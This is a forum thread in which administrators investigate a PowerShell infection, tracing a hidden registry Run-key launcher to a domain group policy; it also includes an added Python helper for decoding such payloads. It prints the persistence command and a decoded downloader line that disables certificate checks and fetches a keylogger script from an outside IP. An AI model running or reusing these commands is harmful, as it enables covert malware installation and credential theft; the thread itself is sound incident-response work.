Suspicious Powershell Activity

    Question

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:

    Certificate - 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

    Below is a screenshot of the processes that start when logging in:

    [Screenshot: Powershell processes]

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,

    Todd

    Monday, July 25, 2016 3:03 PM

All replies

  • After decoding and decompressing the encoded string, one gets to a command which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('https://45.56.75.185/script?id=random&name=keylog')

    the resulting script seems to be based on PowerSploit

    Monday, July 25, 2016 7:53 PM
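The decode-then-decompress step described in the reply above, as an added triage helper that is not from the original thread: it peels the `-enc` layer (base64 of UTF-16LE), then each `FromBase64String(...)` layer, decompressing gzip, zlib or raw deflate where present, and lists the downloader markers found in each stage. The two-stage sample it decodes is constructed here with a placeholder URL, not the registry value from the thread.

```python
import base64
import gzip
import re
import zlib

# Strings a defender expects in a downloader stage (two appear in the thread's decoded command).
SUSPICIOUS = ("ServerCertificateValidationCallback", "DownloadString", "FromBase64String",
              "Compression.", "IEX", "Invoke-Expression")
B64_CALL = re.compile(r"FromBase64String\(['\"]([A-Za-z0-9+/=]+)['\"]\)")

def decode_enc(encoded: str) -> str:
    """powershell -enc takes base64 of UTF-16LE text, not of UTF-8."""
    return base64.b64decode(encoded).decode("utf-16-le")

def decompress_any(blob: bytes) -> bytes:
    """Handle the three wrappers such scripts usually use: gzip, zlib, raw deflate."""
    if blob[:2] == b"\x1f\x8b":
        return gzip.decompress(blob)
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            pass
    raise ValueError("not a gzip/zlib/deflate stream")

def unwrap(encoded: str, max_layers: int = 5) -> list:
    """Peel the -enc layer, then each FromBase64String(...) layer, decompressing when needed."""
    layers = [decode_enc(encoded)]
    for _ in range(max_layers):
        m = B64_CALL.search(layers[-1])
        if not m:
            break
        inner = base64.b64decode(m.group(1))
        try:
            inner = decompress_any(inner)
        except ValueError:
            pass  # plain base64 with no compression layer
        layers.append(inner.decode("utf-8", errors="replace"))
    return layers

def flag(script: str) -> list:
    """Return the SUSPICIOUS markers present in one decoded layer."""
    low = script.lower()
    return [s for s in SUSPICIOUS if s.lower() in low]

def build_sample() -> str:
    """Constructed two-stage payload (placeholder URL), shaped like the thread's registry value."""
    inner = ("[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }\n"
             "(New-Object Net.WebClient).DownloadString('https://example.invalid/script')")
    wrapped = base64.b64encode(gzip.compress(inner.encode())).decode()
    outer = f"$d=[Convert]::FromBase64String('{wrapped}')  # constructed: gzip-wrapped second stage"
    return base64.b64encode(outer.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for i, layer in enumerate(unwrap(build_sample())):
        print(f"--- layer {i}, flags={flag(layer)}\n{layer}\n")
```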
  • OK.  That makes sense since the initial tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?

    Thanks,

    Todd

    Monday, July 25, 2016 7:57 PM
  • what do you mean "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the ip address 45.56.75.185.
    The original vector/dropper might have been via browser or email.

    I for myself would nuke from orbit ( = reinstall Windows), but you could contact someone at bleepingcomputer.com

    Monday, July 25, 2016 8:58 PM
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours.  I need to find the source PC first before I nuke anything.

    I'll post at bleepingcomputer.com to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.

    Todd

    Tuesday, July 26, 2016 11:21 AM
  • We are looking forward to your good news:)

    Wednesday, July 27, 2016 9:44 AM
    Moderator
  • So mystery is somewhat solved.  I traced it down to a powershell command that was placed in our default domain group policy.  I removed this entry and it seems to be slowly removing itself from the network.

    The next thing to figure out now is where this came from.  There are only three people at our company with the domain password and none of us put that there.

    The task that was running in the group policy, said it was created by domain\administrator so we are a bit perplexed over this one.  Any ideas on how to trace this part of it?

    Thanks,

    James


    Friday, August 05, 2016 7:53 PM